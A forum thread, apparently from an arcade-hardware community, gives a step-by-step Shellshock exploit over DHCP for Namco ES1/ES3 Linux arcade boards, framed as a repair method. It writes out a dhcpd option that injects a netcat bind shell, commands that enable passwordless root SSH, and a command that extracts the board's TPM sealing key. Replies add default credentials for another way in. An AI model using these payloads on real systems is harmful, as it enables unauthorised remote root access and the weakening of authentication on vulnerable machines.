Public Domain Namco ES1/ES3 (Linux) full access for easy repair (brick, change gpu, broken hdd etc.)

Everyone loves a backstory:
It was a rainy evening in Finland and I had just gotten this PCB, me and friend were brain storming various ways to get in. We tried almost all known tricks and linux tricks but nothing worked.

Until that is my friend Mr. xxx woke me up in the morning and telling he owned it. Of course I was like "sure man", plz tell me more. But he really did figure this out in less than 24 hours.

Come on man, cut to the chase:

OK so, since this exploit was leaked by my former friend to his friends for "repair help" (profit) when he said he wouldn't do it, I just don't care anymore.

Here are the details for the linux (not windows, even tho I have that exploited too) version of ES1/ES3 exploit.

With this method you can "remarry" new HDD to the system, repair broken systems to replace parts or even change game files yourself.

To remarry and other stuff, I can write about that later. But now off to exploit.

Not intended for piracy purposes!

NOTE:
UNDER NO CIRCUMSTANCES SHOULD YOU CONNECT ES1 HDD TO WINDOWS PC, IT WILL BRICK.
Use standalone USB dock with 2 SATA connectors to clone it and then use the cloned hdd to dump the games or linux machine if you want to change the original HDD itself.
If you have connected the HDD to windows PC, DO NOT BOOT IT ON THE PCB OR IT WILL SUICIDE!!!!!!!!!!!!!!!!!!!!!!!!

Known games:
- Tank Tank Tank
- Dead Heat
- Dead Heat Riders
- Nirin

Requirements:
- some linux knowledge (all tho possible also with Windows, but Linux is far easier)
- ES1/ES3 motherboard with Linux
- Network cable
- VM or dedicated linux machine.

Steps:
1. Install dhcpd on linux machine (Disable all other DHCP in the network if you use for example a router)
2. Edit/add in dhcpd config: (You can limit the DHCP to the ES1 machines MAC too if you want to safe)
option domain-name "() { :;}; /bin/nc -lp23 -c/bin/sh&";
3. Put this in a new local file:
sed -i 's/nullok_secure$/nullok/' /etc/pam.d/common-auth
sed -i 's/.*PermitEmptyPasswords.*/PermitEmptyPasswords yes/' /etc/ssh/sshd_config
/etc/init.d/ssh restart
4. Connect RJ45 cable to ES1 and your PC
5. Boot the system. Once it's pingable,
cat <thatfile> | nc -q1 <192.168.X.X> 23
5. Profit and login as root via putty/ssh or similar without password.

Proper explanation of the exploit:
blog.trendmicro.com/trendlabs-…llshock-exploit-via-dhcp/

Note:
- Some systems you have like 10 second window to execute the exploit as they shutdown all network connections. You need to quickly connect and dump the TPM key with command (to mount it on other linux machine See note!!!!!!!!!!!)
arcadeunsealkey /etc/arcade/sealkey

Credits:
- android for the PCB
- Mr. xxx who didn't want his real name/nick revealed.

Exploit was found on: 11th, June of 2015

If someone here comes spewing stuff that we weren't first to do this, I will release all the logs showing the truth

Enjoy

RE-UPPED TO ASSEMBLER GAMES SINCE WAS CENSORED ON OTHER FORUMS!

I will write all my new tutorials here, land of the free.

 

Is this guide meant for ES1,2 and 3 or just 1 and 3?

 

Both if it runs Linux. They are essential the same system but 3 has more horse power.

 

Thanks for the exploit info.
=)

 

Cheers Jack. Hope to see more of this in the future!

 

Jackalus, actually it's as simple as starting /usr/sbin/sshd using shellshock. Then you can log in as user "user" with password "live" and execute sudo -i to get root.

I wrote an article about Arcade Linux and ES1 protection before knowing about shellshock. In case you're intererested, it's here:
https://medium.com/@ValdikSS/resear...overing-namco-system-es1-arcades-1f8423fdeb3b
It also mentions why HDDs are hoaxed if connected to a Windows PC and how to repair them to make game boot again.

 

Nice write up, I knew most of that stuff
I have lot of exploits for various systems but because of mass piracy in Arcade scene I will not leak them. You really think no one has hacked all the systems in the background without telling people? Of course but no one wants another taito type x2 mass piracy issue.